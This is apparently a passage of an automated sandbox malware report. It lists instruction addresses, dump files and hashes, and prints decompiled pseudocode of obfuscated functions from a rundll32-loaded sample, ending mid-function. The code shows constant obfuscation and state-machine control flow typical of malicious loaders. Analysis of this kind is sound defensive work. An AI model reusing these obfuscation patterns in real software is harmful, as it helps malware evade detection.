                                                                                                                                  0x002d5f95
                                                                                                                                  0x002d5f99
                                                                                                                                  0x002d5f9e
                                                                                                                                  0x002d5fa6
                                                                                                                                  0x002d5fae
                                                                                                                                  0x002d5fb6
                                                                                                                                  0x002d5fbe
                                                                                                                                  0x002d5fc6
                                                                                                                                  0x002d5fd1
                                                                                                                                  0x002d5fd9
                                                                                                                                  0x002d5fe4
                                                                                                                                  0x002d5fec
                                                                                                                                  0x002d5ff6
                                                                                                                                  0x002d5ffa
                                                                                                                                  0x002d6002
                                                                                                                                  0x002d600a
                                                                                                                                  0x002d6012
                                                                                                                                  0x002d6017
                                                                                                                                  0x002d601c
                                                                                                                                  0x002d6024
                                                                                                                                  0x002d6035
                                                                                                                                  0x002d6038
                                                                                                                                  0x002d603c
                                                                                                                                  0x002d6044
                                                                                                                                  0x002d604c
                                                                                                                                  0x002d6054
                                                                                                                                  0x002d605c
                                                                                                                                  0x002d6064
                                                                                                                                  0x002d6069
                                                                                                                                  0x002d6071
                                                                                                                                  0x002d6079
                                                                                                                                  0x002d6081
                                                                                                                                  0x002d6091
                                                                                                                                  0x002d609a
                                                                                                                                  0x002d609d
                                                                                                                                  0x002d60a1
                                                                                                                                  0x002d60a9
                                                                                                                                  0x002d60b1
                                                                                                                                  0x002d60b9
                                                                                                                                  0x002d60be
                                                                                                                                  0x002d60c6
                                                                                                                                  0x002d60ce
                                                                                                                                  0x002d60d6
                                                                                                                                  0x002d60e2
                                                                                                                                  0x002d60e6
                                                                                                                                  0x002d60ee
                                                                                                                                  0x002d60f6
                                                                                                                                  0x002d60fe
                                                                                                                                  0x002d6106
                                                                                                                                  0x002d610e
                                                                                                                                  0x002d6116
                                                                                                                                  0x002d611e
                                                                                                                                  0x002d6126
                                                                                                                                  0x002d612e
                                                                                                                                  0x002d6136
                                                                                                                                  0x002d613b
                                                                                                                                  0x002d6148
                                                                                                                                  0x002d614b
                                                                                                                                  0x002d614f
                                                                                                                                  0x002d6157
                                                                                                                                  0x002d6167
                                                                                                                                  0x002d616b
                                                                                                                                  0x002d6173
                                                                                                                                  0x002d617b
                                                                                                                                  0x002d6183
                                                                                                                                  0x002d6188
                                                                                                                                  0x002d6190
                                                                                                                                  0x002d6194
                                                                                                                                  0x002d619c
                                                                                                                                  0x002d61a9
                                                                                                                                  0x002d61aa
                                                                                                                                  0x002d61ae
                                                                                                                                  0x002d61b6
                                                                                                                                  0x002d61be
                                                                                                                                  0x002d61c6
                                                                                                                                  0x002d61ce
                                                                                                                                  0x002d61dc
                                                                                                                                  0x002d61e8
                                                                                                                                  0x002d61f0
                                                                                                                                  0x002d61fa
                                                                                                                                  0x002d61ff
                                                                                                                                  0x002d6207
                                                                                                                                  0x002d620f
                                                                                                                                  0x002d6214
                                                                                                                                  0x002d621c
                                                                                                                                  0x002d6224
                                                                                                                                  0x002d6232
                                                                                                                                  0x002d6237
                                                                                                                                  0x002d623d
                                                                                                                                  0x002d6246
                                                                                                                                  0x002d624b
                                                                                                                                  0x002d6251
                                                                                                                                  0x002d6259
                                                                                                                                  0x002d6261
                                                                                                                                  0x002d6265
                                                                                                                                  0x002d626a
                                                                                                                                  0x002d6272
                                                                                                                                  0x002d6284
                                                                                                                                  0x002d6289
                                                                                                                                  0x002d6292
                                                                                                                                  0x002d629d
                                                                                                                                  0x002d62a5
                                                                                                                                  0x002d62a9
                                                                                                                                  0x002d62ae
                                                                                                                                  0x002d62b6
                                                                                                                                  0x002d62be
                                                                                                                                  0x002d62c6
                                                                                                                                  0x002d62ce
                                                                                                                                  0x002d62d6
                                                                                                                                  0x002d62de
                                                                                                                                  0x002d62f0
                                                                                                                                  0x002d62f8
                                                                                                                                  0x002d62ff
                                                                                                                                  0x002d630a
                                                                                                                                  0x002d6312
                                                                                                                                  0x002d631a
                                                                                                                                  0x002d631f
                                                                                                                                  0x002d6327
                                                                                                                                  0x002d6335
                                                                                                                                  0x002d6418
                                                                                                                                  0x002d647f
                                                                                                                                  0x002d6484
                                                                                                                                  0x002d648b
                                                                                                                                  0x002d64c8
                                                                                                                                  0x002d64ca
                                                                                                                                  0x002d64d2
                                                                                                                                  0x002d648d
                                                                                                                                  0x002d648d
                                                                                                                                  0x00000000
                                                                                                                                  0x002d648d
                                                                                                                                  0x002d633b
                                                                                                                                  0x002d6341
                                                                                                                                  0x002d640e
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6347
                                                                                                                                  0x002d634d
                                                                                                                                  0x002d63ec
                                                                                                                                  0x002d63ed
                                                                                                                                  0x002d63ee
                                                                                                                                  0x002d63f3
                                                                                                                                  0x002d63fe
                                                                                                                                  0x002d6404
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6404
                                                                                                                                  0x002d6353
                                                                                                                                  0x002d6359
                                                                                                                                  0x002d64b1
                                                                                                                                  0x002d64b7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d64bd
                                                                                                                                  0x002d635f
                                                                                                                                  0x002d635f
                                                                                                                                  0x002d63bd
                                                                                                                                  0x002d63c2
                                                                                                                                  0x002d63c9
                                                                                                                                  0x002d63cf
                                                                                                                                  0x00000000
                                                                                                                                  0x002d63cf
                                                                                                                                  0x002d63c9
                                                                                                                                  0x002d6359
                                                                                                                                  0x002d634d
                                                                                                                                  0x002d6341
                                                                                                                                  0x002d64e1
                                                                                                                                  0x002d64e1
                                                                                                                                  0x002d64a6
                                                                                                                                  0x002d64ac
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: U$3n$3$TNz7$`%8$`%8$fxZn$~&t$6B
                                                                                                                                  • API String ID: 0-1604698900
                                                                                                                                  • Opcode ID: 07c2f298ae15722ece1c17feda694d2c26b3b4279983856fc627f232ed47ac51
                                                                                                                                  • Instruction ID: a04e4b476d9659372ca4b9a9f2f393ed83ddacead2c63b4d6114e1120e8338c7
                                                                                                                                  • Opcode Fuzzy Hash: 07c2f298ae15722ece1c17feda694d2c26b3b4279983856fc627f232ed47ac51
                                                                                                                                  • Instruction Fuzzy Hash: 30F10E714087819FD368CF66D589A5BBBF1FB84B48F50891DF29A86260D7B28859CF03
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100453C8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24registryclipboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Version$ClipboardFormatRegister
                                                                                                                                  • String ID: MSWHEEL_ROLLMSG
                                                                                                                                  • API String ID: 2888461884-2485103130
                                                                                                                                  • Opcode ID: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                                  • Instruction ID: 7f315ad506f9c9b1e51aced78a2c78e4f88a242cc2e5f9aa46fc8e210ad3a912
                                                                                                                                  • Opcode Fuzzy Hash: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                                  • Instruction Fuzzy Hash: 94E0483680016396F3019764AD447A43AD4D7896D7F324037DE00C2551DA6609C3866D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002ECB5B Relevance: 10.3, Strings: 8, Instructions: 335COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                  			E002ECB5B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v520;
				char _v1040;
				char _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				void* _t341;
				void* _t370;
				void* _t379;
				intOrPtr _t382;
				intOrPtr _t385;
				void* _t396;
				intOrPtr _t399;
				intOrPtr _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int* _t449;

				_push(_a12);
				_t436 = 0;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E002E20B9(_t341);
				_v1572 = 0xe82680;
				_t449 =  &(( &_v1708)[5]);
				_v1568 = 0;
				_v1564 = 0;
				_t396 = 0x9368da1;
				_v1584 = 0x42403b;
				_v1584 = _v1584 + 0xffffd771;
				_v1584 = _v1584 ^ 0x00421785;
				_v1692 = 0xc00255;
				_t437 = 0x16;
				_v1692 = _v1692 / _t437;
				_v1692 = _v1692 + 0xffff6b87;
				_v1692 = _v1692 + 0xffff176e;
				_v1692 = _v1692 ^ 0x0004c90f;
				_v1668 = 0x5abcaa;
				_v1668 = _v1668 | 0xa6adf3e3;
				_v1668 = _v1668 + 0xffff713c;
				_v1668 = _v1668 << 6;
				_v1668 = _v1668 ^ 0xbfd49dc8;
				_v1700 = 0xb35187;
				_v1700 = _v1700 | 0x50a44dff;
				_v1700 = _v1700 + 0xfffff2e6;
				_v1700 = _v1700 >> 8;
				_v1700 = _v1700 ^ 0x0051b9c1;
				_v1644 = 0x4d7cc3;
				_v1644 = _v1644 + 0xffffa786;
				_v1644 = _v1644 | 0x8b8a715e;
				_v1644 = _v1644 ^ 0x6234f021;
				_v1644 = _v1644 ^ 0xe9f998a6;
				_v1624 = 0x204c5b;
				_v1624 = _v1624 + 0xffffa901;
				_v1624 = _v1624 + 0x49e1;
				_v1624 = _v1624 ^ 0x002fe6aa;
				_v1632 = 0xbb0a9b;
				_v1632 = _v1632 * 0x52;
				_v1632 = _v1632 | 0x83893080;
				_v1632 = _v1632 ^ 0xbbe905c0;
				_v1620 = 0x19fb1a;
				_v1620 = _v1620 | 0x985eae3d;
				_v1620 = _v1620 + 0xf613;
				_v1620 = _v1620 ^ 0x9864c971;
				_v1656 = 0x35ecb4;
				_v1656 = _v1656 * 0x29;
				_v1656 = _v1656 + 0x1081;
				_v1656 = _v1656 + 0xffffd324;
				_v1656 = _v1656 ^ 0x08a8fe56;
				_v1580 = 0xc60f6f;
				_v1580 = _v1580 + 0xffffd3e6;
				_v1580 = _v1580 ^ 0x00c233ea;
				_v1664 = 0x2df5c;
				_v1664 = _v1664 << 8;
				_v1664 = _v1664 * 0x4c;
				_v1664 = _v1664 + 0xffffaed7;
				_v1664 = _v1664 ^ 0xda40187b;
				_v1672 = 0x38409b;
				_v1672 = _v1672 * 0x33;
				_v1672 = _v1672 | 0x7fcdffbb;
				_v1672 = _v1672 ^ 0x7ff87770;
				_v1680 = 0xe751cb;
				_v1680 = _v1680 ^ 0x8590ed7d;
				_v1680 = _v1680 + 0xffffebc9;
				_v1680 = _v1680 * 0x5e;
				_v1680 = _v1680 ^ 0x01e2719c;
				_v1688 = 0x15e1cd;
				_v1688 = _v1688 + 0xfe19;
				_v1688 = _v1688 + 0xffffc88c;
				_v1688 = _v1688 << 7;
				_v1688 = _v1688 ^ 0x0b5f3deb;
				_v1696 = 0x33a377;
				_v1696 = _v1696 << 0xa;
				_v1696 = _v1696 ^ 0xfb2d04b5;
				_v1696 = _v1696 | 0xd2f07883;
				_v1696 = _v1696 ^ 0xf7fa7ce3;
				_v1640 = 0x94004d;
				_v1640 = _v1640 >> 0xa;
				_t438 = 0x67;
				_v1640 = _v1640 * 0x3d;
				_v1640 = _v1640 >> 7;
				_v1640 = _v1640 ^ 0x00039ca1;
				_v1648 = 0xfcfef3;
				_v1648 = _v1648 * 0x18;
				_v1648 = _v1648 + 0x9c71;
				_v1648 = _v1648 | 0xf5d6202a;
				_v1648 = _v1648 ^ 0xf7f57601;
				_v1596 = 0xc58f80;
				_v1596 = _v1596 + 0xffff2f17;
				_v1596 = _v1596 ^ 0x00ce700d;
				_v1684 = 0xee980b;
				_v1684 = _v1684 >> 6;
				_v1684 = _v1684 / _t438;
				_v1684 = _v1684 + 0xffff2a3f;
				_v1684 = _v1684 ^ 0xfff3655c;
				_v1652 = 0x45a4a9;
				_v1652 = _v1652 >> 0xe;
				_t439 = 0x6e;
				_v1652 = _v1652 * 0x51;
				_v1652 = _v1652 + 0x9be3;
				_v1652 = _v1652 ^ 0x0004d4d8;
				_v1708 = 0x222243;
				_t176 =  &_v1708; // 0x222243
				_v1708 =  *_t176 / _t439;
				_v1708 = _v1708 << 9;
				_v1708 = _v1708 + 0xffff4a12;
				_v1708 = _v1708 ^ 0x009b5339;
				_v1612 = 0x464ea3;
				_v1612 = _v1612 + 0x89cc;
				_v1612 = _v1612 >> 2;
				_v1612 = _v1612 ^ 0x00167067;
				_v1588 = 0xd74d9e;
				_v1588 = _v1588 | 0x529da741;
				_v1588 = _v1588 ^ 0x52d09c78;
				_v1628 = 0x60b5eb;
				_v1628 = _v1628 >> 9;
				_t440 = 0x19;
				_v1628 = _v1628 / _t440;
				_v1628 = _v1628 ^ 0x000ff1bc;
				_v1676 = 0xfb7b01;
				_v1676 = _v1676 << 4;
				_v1676 = _v1676 + 0xffffc28e;
				_t441 = 0x1b;
				_v1676 = _v1676 / _t441;
				_v1676 = _v1676 ^ 0x0096cb21;
				_v1660 = 0xed67c1;
				_v1660 = _v1660 << 0xa;
				_v1660 = _v1660 | 0xef7d69c8;
				_v1660 = _v1660 << 2;
				_v1660 = _v1660 ^ 0xfff42fe1;
				_v1604 = 0x46c7e8;
				_v1604 = _v1604 << 0xf;
				_v1604 = _v1604 ^ 0x63fe3710;
				_v1636 = 0x7a345b;
				_v1636 = _v1636 + 0xd479;
				_v1636 = _v1636 + 0x8c7f;
				_v1636 = _v1636 ^ 0x00708a00;
				_v1704 = 0x80508e;
				_v1704 = _v1704 ^ 0xf958081f;
				_t442 = 0x4b;
				_v1704 = _v1704 / _t442;
				_t443 = 0x34;
				_v1704 = _v1704 * 0x44;
				_v1704 = _v1704 ^ 0xe2885afb;
				_v1576 = 0x325f4f;
				_t259 =  &_v1576; // 0x325f4f
				_v1576 =  *_t259 * 0x7a;
				_v1576 = _v1576 ^ 0x180920ed;
				_v1592 = 0xd554f9;
				_v1592 = _v1592 * 0x4e;
				_v1592 = _v1592 ^ 0x40f8e8dd;
				_v1608 = 0x6be570;
				_v1608 = _v1608 + 0x3d4f;
				_v1608 = _v1608 ^ 0x4461575c;
				_v1608 = _v1608 ^ 0x440eeedf;
				_v1616 = 0x4acfbf;
				_v1616 = _v1616 / _t443;
				_t444 = 0xe;
				_v1616 = _v1616 / _t444;
				_v1616 = _v1616 ^ 0x000fdd65;
				_v1600 = 0x55de88;
				_v1600 = _v1600 << 2;
				_v1600 = _v1600 ^ 0x01580110;
				do {
					while(_t396 != 0x196a97b) {
						if(_t396 == 0x2ca432c) {
							_push(_v1652);
							_push(_v1684);
							_t379 = E002EDCF7(_v1596, 0x2d10f0, __eflags);
							E002E176B( &_v1560, __eflags);
							_t382 =  *0x2f3e10; // 0x0
							_t385 =  *0x2f3e10; // 0x0
							E002EE32E(_v1612, __eflags, _t379, _v1588,  &_v1040, _v1628, _t385 + 0x23c, _v1676,  &_v520, _v1660, _v1604, _v1636, _t436, _t382 + 0x1c,  &_v1560);
							E002DA8B0(_v1704, _t379, _v1576);
							_t449 =  &(_t449[0xf]);
							_t396 = 0x9d0e956;
							continue;
						} else {
							if(_t396 == 0x9368da1) {
								_push(_v1644);
								_push(_v1584);
								_push(_v1700);
								_push( &_v1040);
								E002E46BB(_v1692, _v1668);
								_t449 = _t449 - 0xc + 0x1c;
								_t396 = 0x196a97b;
								continue;
							} else {
								_t456 = _t396 - 0x9d0e956;
								if(_t396 != 0x9d0e956) {
									goto L10;
								} else {
									_push(_v1600);
									_push(_t436);
									_push(_t396);
									_push(_t436);
									_push(_t436);
									_push(_v1616);
									_push( &_v520);
									E002DAB87(_v1592, _v1608, _t456);
									_t436 =  !=  ? 1 : _t436;
								}
							}
						}
						L6:
						return _t436;
					}
					_push(_v1620);
					_push(_v1632);
					_t370 = E002EDCF7(_v1624, 0x2d1020, __eflags);
					E002E176B( &_v1560, __eflags);
					_t399 =  *0x2f3e10; // 0x0
					_t336 = _t399 + 0x1c; // 0x1c
					_t337 = _t399 + 0x23c; // 0x23c
					E002E1652(_v1580, __eflags, _t337, _t336, _v1664, _v1672, _t370, 0x104,  &_v520, _v1680,  &_v1040, _v1688,  &_v1560, _v1696);
					E002DA8B0(_v1640, _t370, _v1648);
					_t449 =  &(_t449[0xf]);
					_t396 = 0x9d0e956;
					L10:
					__eflags = _t396 - 0xce3b296;
				} while (__eflags != 0);
				goto L6;
			}




























































                                                                                                                                  0x002ecb65
                                                                                                                                  0x002ecb6c
                                                                                                                                  0x002ecb6e
                                                                                                                                  0x002ecb75
                                                                                                                                  0x002ecb7c
                                                                                                                                  0x002ecb7d
                                                                                                                                  0x002ecb7e
                                                                                                                                  0x002ecb83
                                                                                                                                  0x002ecb8e
                                                                                                                                  0x002ecb91
                                                                                                                                  0x002ecb9a
                                                                                                                                  0x002ecba1
                                                                                                                                  0x002ecba6
                                                                                                                                  0x002ecbb1
                                                                                                                                  0x002ecbbc
                                                                                                                                  0x002ecbc7
                                                                                                                                  0x002ecbd5
                                                                                                                                  0x002ecbd8
                                                                                                                                  0x002ecbdc
                                                                                                                                  0x002ecbe4
                                                                                                                                  0x002ecbec
                                                                                                                                  0x002ecbf4
                                                                                                                                  0x002ecbfc
                                                                                                                                  0x002ecc04
                                                                                                                                  0x002ecc0c
                                                                                                                                  0x002ecc11
                                                                                                                                  0x002ecc19
                                                                                                                                  0x002ecc21
                                                                                                                                  0x002ecc29
                                                                                                                                  0x002ecc31
                                                                                                                                  0x002ecc36
                                                                                                                                  0x002ecc3e
                                                                                                                                  0x002ecc46
                                                                                                                                  0x002ecc4e
                                                                                                                                  0x002ecc56
                                                                                                                                  0x002ecc5e
                                                                                                                                  0x002ecc66
                                                                                                                                  0x002ecc6e
                                                                                                                                  0x002ecc76
                                                                                                                                  0x002ecc7e
                                                                                                                                  0x002ecc86
                                                                                                                                  0x002ecc93
                                                                                                                                  0x002ecc97
                                                                                                                                  0x002ecc9f
                                                                                                                                  0x002ecca7
                                                                                                                                  0x002eccaf
                                                                                                                                  0x002eccb7
                                                                                                                                  0x002eccbf
                                                                                                                                  0x002eccc7
                                                                                                                                  0x002eccd4
                                                                                                                                  0x002eccd8
                                                                                                                                  0x002ecce0
                                                                                                                                  0x002ecce8
                                                                                                                                  0x002eccf0
                                                                                                                                  0x002eccfb
                                                                                                                                  0x002ecd06
                                                                                                                                  0x002ecd11
                                                                                                                                  0x002ecd19
                                                                                                                                  0x002ecd23
                                                                                                                                  0x002ecd27
                                                                                                                                  0x002ecd2f
                                                                                                                                  0x002ecd37
                                                                                                                                  0x002ecd44
                                                                                                                                  0x002ecd48
                                                                                                                                  0x002ecd50
                                                                                                                                  0x002ecd58
                                                                                                                                  0x002ecd60
                                                                                                                                  0x002ecd68
                                                                                                                                  0x002ecd75
                                                                                                                                  0x002ecd7b
                                                                                                                                  0x002ecd83
                                                                                                                                  0x002ecd8b
                                                                                                                                  0x002ecd93
                                                                                                                                  0x002ecd9b
                                                                                                                                  0x002ecda0
                                                                                                                                  0x002ecda8
                                                                                                                                  0x002ecdb0
                                                                                                                                  0x002ecdb5
                                                                                                                                  0x002ecdbd
                                                                                                                                  0x002ecdc5
                                                                                                                                  0x002ecdcd
                                                                                                                                  0x002ecdd5
                                                                                                                                  0x002ecde1
                                                                                                                                  0x002ecde4
                                                                                                                                  0x002ecde8
                                                                                                                                  0x002ecded
                                                                                                                                  0x002ecdf5
                                                                                                                                  0x002ece02
                                                                                                                                  0x002ece06
                                                                                                                                  0x002ece0e
                                                                                                                                  0x002ece16
                                                                                                                                  0x002ece1e
                                                                                                                                  0x002ece29
                                                                                                                                  0x002ece34
                                                                                                                                  0x002ece3f
                                                                                                                                  0x002ece47
                                                                                                                                  0x002ece54
                                                                                                                                  0x002ece58
                                                                                                                                  0x002ece60
                                                                                                                                  0x002ece68
                                                                                                                                  0x002ece70
                                                                                                                                  0x002ece7a
                                                                                                                                  0x002ece7d
                                                                                                                                  0x002ece81
                                                                                                                                  0x002ece89
                                                                                                                                  0x002ece91
                                                                                                                                  0x002ece99
                                                                                                                                  0x002ecea1
                                                                                                                                  0x002ecea5
                                                                                                                                  0x002eceaa
                                                                                                                                  0x002eceb2
                                                                                                                                  0x002eceba
                                                                                                                                  0x002ecec2
                                                                                                                                  0x002ececa
                                                                                                                                  0x002ececf
                                                                                                                                  0x002eced7
                                                                                                                                  0x002ecee2
                                                                                                                                  0x002eceed
                                                                                                                                  0x002ecef8
                                                                                                                                  0x002ecf00
                                                                                                                                  0x002ecf09
                                                                                                                                  0x002ecf0e
                                                                                                                                  0x002ecf14
                                                                                                                                  0x002ecf1c
                                                                                                                                  0x002ecf24
                                                                                                                                  0x002ecf29
                                                                                                                                  0x002ecf35
                                                                                                                                  0x002ecf38
                                                                                                                                  0x002ecf3c
                                                                                                                                  0x002ecf44
                                                                                                                                  0x002ecf4c
                                                                                                                                  0x002ecf51
                                                                                                                                  0x002ecf5b
                                                                                                                                  0x002ecf65
                                                                                                                                  0x002ecf72
                                                                                                                                  0x002ecf7a
                                                                                                                                  0x002ecf7f
                                                                                                                                  0x002ecf87
                                                                                                                                  0x002ecf8f
                                                                                                                                  0x002ecf97
                                                                                                                                  0x002ecf9f
                                                                                                                                  0x002ecfa7
                                                                                                                                  0x002ecfaf
                                                                                                                                  0x002ecfbd
                                                                                                                                  0x002ecfc2
                                                                                                                                  0x002ecfcd
                                                                                                                                  0x002ecfd0
                                                                                                                                  0x002ecfd4
                                                                                                                                  0x002ecfdc
                                                                                                                                  0x002ecfe7
                                                                                                                                  0x002ecfef
                                                                                                                                  0x002ecff6
                                                                                                                                  0x002ed001
                                                                                                                                  0x002ed014
                                                                                                                                  0x002ed01b
                                                                                                                                  0x002ed026
                                                                                                                                  0x002ed02e
                                                                                                                                  0x002ed036
                                                                                                                                  0x002ed03e
                                                                                                                                  0x002ed046
                                                                                                                                  0x002ed056
                                                                                                                                  0x002ed05e
                                                                                                                                  0x002ed061
                                                                                                                                  0x002ed065
                                                                                                                                  0x002ed06d
                                                                                                                                  0x002ed075
                                                                                                                                  0x002ed07a
                                                                                                                                  0x002ed082
                                                                                                                                  0x002ed082
                                                                                                                                  0x002ed090
                                                                                                                                  0x002ed119
                                                                                                                                  0x002ed122
                                                                                                                                  0x002ed12d
                                                                                                                                  0x002ed13b
                                                                                                                                  0x002ed149
                                                                                                                                  0x002ed16e
                                                                                                                                  0x002ed19b
                                                                                                                                  0x002ed1ad
                                                                                                                                  0x002ed1b2
                                                                                                                                  0x002ed1b5
                                                                                                                                  0x00000000
                                                                                                                                  0x002ed096
                                                                                                                                  0x002ed09c
                                                                                                                                  0x002ed0e8
                                                                                                                                  0x002ed0f3
                                                                                                                                  0x002ed0fa
                                                                                                                                  0x002ed109
                                                                                                                                  0x002ed10a
                                                                                                                                  0x002ed10f
                                                                                                                                  0x002ed112
                                                                                                                                  0x00000000
                                                                                                                                  0x002ed09e
                                                                                                                                  0x002ed09e
                                                                                                                                  0x002ed0a0
                                                                                                                                  0x00000000
                                                                                                                                  0x002ed0a6
                                                                                                                                  0x002ed0a6
                                                                                                                                  0x002ed0b1
                                                                                                                                  0x002ed0b2
                                                                                                                                  0x002ed0b3
                                                                                                                                  0x002ed0b4
                                                                                                                                  0x002ed0b5
                                                                                                                                  0x002ed0ca
                                                                                                                                  0x002ed0cb
                                                                                                                                  0x002ed0d8
                                                                                                                                  0x002ed0d8
                                                                                                                                  0x002ed0a0
                                                                                                                                  0x002ed09c
                                                                                                                                  0x002ed0db
                                                                                                                                  0x002ed0e7
                                                                                                                                  0x002ed0e7
                                                                                                                                  0x002ed1bc
                                                                                                                                  0x002ed1c5
                                                                                                                                  0x002ed1cd
                                                                                                                                  0x002ed1db
                                                                                                                                  0x002ed212
                                                                                                                                  0x002ed21f
                                                                                                                                  0x002ed223
                                                                                                                                  0x002ed22e
                                                                                                                                  0x002ed243
                                                                                                                                  0x002ed248
                                                                                                                                  0x002ed24b
                                                                                                                                  0x002ed24d
                                                                                                                                  0x002ed24d
                                                                                                                                  0x002ed24d
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FolderPath
                                                                                                                                  • String ID: ;@B$C""$M$O_2$[4z$[L $\WaD$I
                                                                                                                                  • API String ID: 1514166925-553023378
                                                                                                                                  • Opcode ID: c79c7f0a3b62858e2ce2356689008d71880f4429e76d3e390215c5a3e73c017c
                                                                                                                                  • Instruction ID: b868e704945e0b3bae0e96f007610414d81534337c535ee1363e97db3fff9df1
                                                                                                                                  • Opcode Fuzzy Hash: c79c7f0a3b62858e2ce2356689008d71880f4429e76d3e390215c5a3e73c017c
                                                                                                                                  • Instruction Fuzzy Hash: 05022EB14083819FD364CF26C98AA9BFBE1FBC4718F50891DF1D986260D7B1895ACF42
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D70B3 Relevance: 10.3, Strings: 8, Instructions: 273COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                  			E002D70B3(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t276;
				intOrPtr _t301;
				void* _t302;
				intOrPtr _t305;
				void* _t306;
				intOrPtr _t312;
				intOrPtr* _t314;
				void* _t316;
				intOrPtr _t340;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int* _t352;

				_t342 = _a4;
				_t314 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t276);
				_v8 = 0xc5496b;
				_t340 = 0;
				_v4 = 0;
				_t352 =  &(( &_v128)[5]);
				_v96 = 0xa893e5;
				_v96 = _v96 >> 0xb;
				_t316 = 0x77ea95;
				_v96 = _v96 ^ 0xaec74c08;
				_v96 = _v96 + 0xffff5908;
				_v96 = _v96 ^ 0xaec6b223;
				_v120 = 0x460837;
				_v120 = _v120 << 0xe;
				_t343 = 0x61;
				_v120 = _v120 / _t343;
				_v120 = _v120 ^ 0xba448c5d;
				_v120 = _v120 ^ 0xbb13b056;
				_v100 = 0x5f60bb;
				_t344 = 0x67;
				_v100 = _v100 / _t344;
